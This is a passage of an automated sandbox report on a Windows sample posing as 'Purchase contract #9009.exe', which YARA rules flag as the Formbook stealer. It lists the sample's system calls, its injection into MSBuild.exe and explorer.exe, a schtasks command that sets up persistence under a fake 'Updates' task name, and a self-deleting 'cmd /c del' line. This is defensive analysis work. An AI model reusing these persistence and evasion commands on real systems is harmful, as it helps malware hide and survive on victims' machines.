          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B3A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B39B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB82F0 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB8270 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB82EA NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB826C NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB8215 NtCreateFile,
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_0010B673
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_00BDC27C
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_00BDEC58
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_00BDEC48
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_046604F8
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_046631C9
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_04660B48
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_046604E8
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_04661600
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_04661C05
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_04660EF1
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_04660F00
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_046619F1
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_04660B39
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_04661BAF
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_0010B6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041B909
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00408C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00408C64
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041CE65
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0167E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01661002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016728EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016720A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CAB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01672B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016603DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0165FA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016722AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01671D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01672D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016725DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01671FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0167DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01672EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4496
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBD466
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B22581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB2D82
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC25DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF0D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC2D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC1D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC2EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B16E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBD616
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC1FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BCDFCE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B220A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC20A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0B090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC28EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1A830
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BCE824
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB1002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B199BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B14120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFF900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC22AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB4AEF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BAFA2B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2EBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BA23E3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BB03DA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BBDBD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B2ABD8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04BC2B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1A309
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B1AB40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EA2FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EA8C60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EA8C64
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EA2D88
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EA2D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04AFB150 appears 133 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 015AB150 appears 48 times
          Source: Purchase contract #9009.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: nzRFOjxWpomfsw.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Purchase contract #9009.exe, 00000001.00000000.635312674.0000000000214000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSTATS.exe2 vs Purchase contract #9009.exe
          Source: Purchase contract #9009.exe, 00000001.00000002.674138068.00000000055C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameConfigNodeType.dll> vs Purchase contract #9009.exe
          Source: Purchase contract #9009.exe, 00000001.00000002.677412365.000000000DC60000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Purchase contract #9009.exe
          Source: Purchase contract #9009.exe, 00000001.00000002.671070380.0000000003D1A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStoreElement.dllB vs Purchase contract #9009.exe
          Source: Purchase contract #9009.exe, 00000001.00000002.677873822.000000000DD50000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Purchase contract #9009.exe
          Source: Purchase contract #9009.exe, 00000001.00000002.677873822.000000000DD50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Purchase contract #9009.exe
          Source: Purchase contract #9009.exeBinary or memory string: OriginalFilenameSTATS.exe2 vs Purchase contract #9009.exe
          Source: Purchase contract #9009.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
          Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
          Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
          Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
          Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmpBinary or memory string: *.sln
          Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
          Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmpBinary or memory string: /ignoreprojectextensions:.sln
          Source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@11/8
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeFile created: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeMutant created: \Sessions\1\BaseNamedObjects\lSWDNesHjauOn
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC4FD.tmpJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: Purchase contract #9009.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Purchase contract #9009.exeVirustotal: Detection: 25%
          Source: Purchase contract #9009.exeReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeFile read: C:\Users\user\Desktop\Purchase contract #9009.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase contract #9009.exe 'C:\Users\user\Desktop\Purchase contract #9009.exe'
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp'
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Purchase contract #9009.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Purchase contract #9009.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Purchase contract #9009.exeStatic file information: File size 1374720 > 1048576
          Source: Purchase contract #9009.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x110400
          Source: Purchase contract #9009.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000004.00000002.717581490.000000000169F000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.905256355.0000000004BEF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, explorer.exe
          Source: Binary string: explorer.pdb source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_0010C836 push es; retf
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_0010C9C6 push es; ret
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_0010B673 push es; iretd
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_0010B673 push es; retf
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_0010B673 push es; retf 0001h
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_0010C976 push es; retf 0001h
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_0010C976 push es; ret
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_0010C976 push es; retn 0001h
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeCode function: 1_2_0010B6C0 push es; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004150FC push ss; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041B3B5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041B46C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041B402 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041B40B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041C57F push dword ptr [7A69614Dh]; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041B6CC push 24CBA43Eh; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015FD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EBBA3A push es; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EBB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EB50FC push ss; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EBB9C3 push eax; retf
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EBBEFB pushad ; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EBB6CC push 24CBA43Eh; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EBB46C push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EBB40B push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EBB402 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_02EBC57F push dword ptr [7A69614Dh]; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 6.97011388032
          Source: initial sampleStatic PE information: section name: .text entropy: 6.97011388032
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeFile created: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp'
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
